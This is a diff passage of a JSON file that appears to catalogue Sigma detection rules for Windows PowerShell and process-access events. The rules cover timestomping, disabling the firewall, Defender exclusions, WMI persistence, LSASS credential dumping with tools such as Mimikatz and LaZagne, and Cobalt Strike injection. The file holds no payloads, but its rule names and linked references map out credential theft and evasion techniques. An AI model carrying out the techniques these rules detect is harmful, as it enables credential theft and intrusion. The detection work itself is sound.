"logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://www.offensive-security.com/metasploit-unleashed/timestomp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ] - }, - "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", - "value": "Powershell Timestomp" - }, - { - "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", - "meta": { - "author": "frack113", - "creation_date": "2021/08/18", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_trigger_profiles.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" - ] - }, - "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "value": "Powershell Trigger Profiles by Add_Content" - }, - { - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Legitimate script" - ], - "filename": "posh_ps_upload.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", - "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ] - }, - "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", - "value": "Windows PowerShell Upload Web Request" - }, - { - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/17", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "filename": "posh_ps_user_discovery_get_aduser.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", - "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell" - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/17", - "falsepositive": [ - "Rare intended use of hidden services", - "Rare FP could occure due to the non linearity of the ScriptBlockText log" - ], - "filename": "posh_ps_using_set_service_to_hide_services.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ] - }, - "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS" - }, - { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", - "meta": { - "author": "James Pemberton / @4A616D6573", - "creation_date": "2019/10/24", - "falsepositive": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." - ], - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", - "value": "Usage Of Web Request Commands And Cmdlets - PowerShell" - }, - { - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", - "meta": { - "author": "frack113", - "creation_date": "2022/04/24", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_win32_product_install_msi.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ] - }, - "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", - "value": "PowerShell WMI Win32_Product Install MSI" - }, - { - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_windows_firewall_profile_disabled.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", - "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", - "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", - "http://woshub.com/manage-windows-firewall-powershell/", - "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", - "value": "Windows Firewall Profile Disabled" - }, - { - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_winlogon_helper_dll.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ] - }, - "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", - "value": "Winlogon Helper DLL" - }, - { - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_win_defender_exclusions_added.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", - "value": "Windows Defender Exclusions Added - PowerShell" - }, - { - "description": "Detects parameters used by WMImplant", - "meta": { - "author": "NVISO", - "creation_date": "2020/03/26", - "falsepositive": [ - "Administrative scripts that use the same keywords." - ], - "filename": "posh_ps_wmimplant.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/FortyNorthSecurity/WMImplant", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ] - }, - "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", - "value": "WMImplant Hack Tool" - }, - { - "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", - "meta": { - "author": "frack113", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_wmi_persistence.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.003" - ] - }, - "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", - "value": "Powershell WMI Persistence" - }, - { - "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_wmi_unquoted_service_search.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", - "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", - "value": "WMIC Unquoted Services Path Lookup - PowerShell" - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/19", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_xml_iex.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", - "value": "Powershell XML Execute Command" - }, - { - "description": "Detects shellcode injection by Metasploit's migrate and Empire's psinject", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2022/03/11", - "falsepositive": [ - "Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well" - ], - "filename": "process_access_win_shellcode_inject_msf_empire.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da", - "value": "Shellcode Injection" - }, - { - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "meta": { - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", - "creation_date": "2022/06/29", - "falsepositive": [ - "Unknown" - ], - "filename": "process_access_win_susp_seclogon.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1541920424635912196", - "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", - "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_susp_seclogon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "value": "Suspicious LSASS Access Via MalSecLogon" - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "meta": { - "author": "Nik Seetharaman", - "creation_date": "2018/07/16", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "filename": "proc_access_win_cmstp_execution_by_access.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" - ] - }, - "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "value": "CMSTP Execution Process Access" - }, - { - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/boku7/injectAmsiBypass", - "https://github.com/boku7/spawn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", - "value": "CobaltStrike BOF Injection Pattern" - }, - { - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "meta": { - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)", - "creation_date": "2017/02/16", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason; please add more filters" - ], - "filename": "proc_access_win_cred_dump_lsass_access.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" - ] - }, - "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "value": "Credential Dumping Tools Accessing LSASS Memory" - }, - { - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "meta": { - "author": "Christian Burkard, Tim Shelton", - "creation_date": "2021/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ] - }, - "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "value": "Direct Syscall of NtOpenProcess" - }, - { - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", "meta": { "author": "Florian Roth", - "creation_date": "2022/09/07", + "creation_date": "2017/04/15", "falsepositive": [ "Unknown" ], - "filename": "proc_access_win_hack_sysmonente.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", - "https://github.com/codewhitesec/SysmonEnte/", - "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "value": "SysmonEnte Usage" - }, - { - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "meta": { - "author": "Bhabesh Raj (rule), @thefLinkk", - "creation_date": "2022/06/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_handlekatz_lsass_access.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/codewhitesec/HandleKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" - ] - }, - "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "value": "HandleKatz Duplicating LSASS Handle" - }, - { - "description": "Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "meta": { - "author": "Tim Burrell", - "creation_date": "2020/01/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_invoke_phantom.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/hlldz/Invoke-Phant0m", - "https://twitter.com/timbmsft/status/900724491076214784", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", - "value": "Suspect Svchost Memory Asccess" - }, - { - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "meta": { - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "creation_date": "2020/09/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml", - "level": "critical", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/bh4b3sh/status/1303674603819081728", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ] - }, - "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "value": "Credential Dumping by LaZagne" - }, - { - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/connormcgarr/LittleCorporal", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" - ] - }, - "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", - "value": "LittleCorporal Generated Maldoc Injection" - }, - { - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "meta": { - "author": "oscd.community, Dmitry Uchakin", - "creation_date": "2020/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", - "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "value": "Load Undocumented Autoelevated COM Interface" - }, - { - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", - "level": "critical", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", - "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "value": "Lsass Memory Dump via Comsvcs DLL" - }, - { - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "meta": { - "author": "Samir Bousseaden, Michael Haag", - "creation_date": "2019/04/03", - "falsepositive": [ - "False positives are present when looking for 0x1410. Exclusions may be required." - ], - "filename": "proc_access_win_lsass_memdump.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", - "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "value": "LSASS Memory Dump" - }, - { - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/10", - "falsepositive": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" - ], - "filename": "proc_access_win_lsass_memdump_evasion.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", - "https://twitter.com/mrd0x/status/1460597833917251595", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "value": "LSASS Access from White-Listed Processes" - }, - { - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/10", - "falsepositive": [ - "Rare programs that contain the word dump in their name and access lsass" - ], - "filename": "proc_access_win_lsass_memdump_indicators.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", - "value": "LSASS Memory Access by Tool Named Dump" - }, - { - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "meta": { - "author": "Florian Roth", - "creation_date": "2012/06/27", - "falsepositive": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" - ], - "filename": "proc_access_win_lsass_werfault.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "value": "WerFault Accassing LSASS" - }, - { - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "meta": { - "author": "John Lambert (tech), Florian Roth (rule)", - "creation_date": "2017/03/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/JohnLaTwC/status/837743453039534080", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", - "value": "Malware Shellcode in Verclsid Target Process" - }, - { - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "meta": { - "author": "Patryk Prauze - ING Tech", - "creation_date": "2019/05/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" - ] - }, - "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "value": "Mimikatz through Windows Remote Management" - }, - { - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/08/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml", - "level": "critical", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/skelsec/pypykatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "value": "Credential Dumping by Pypykatz" - }, - { - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/13", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason" - ], - "filename": "proc_access_win_rare_proc_access_lsass.yml", - 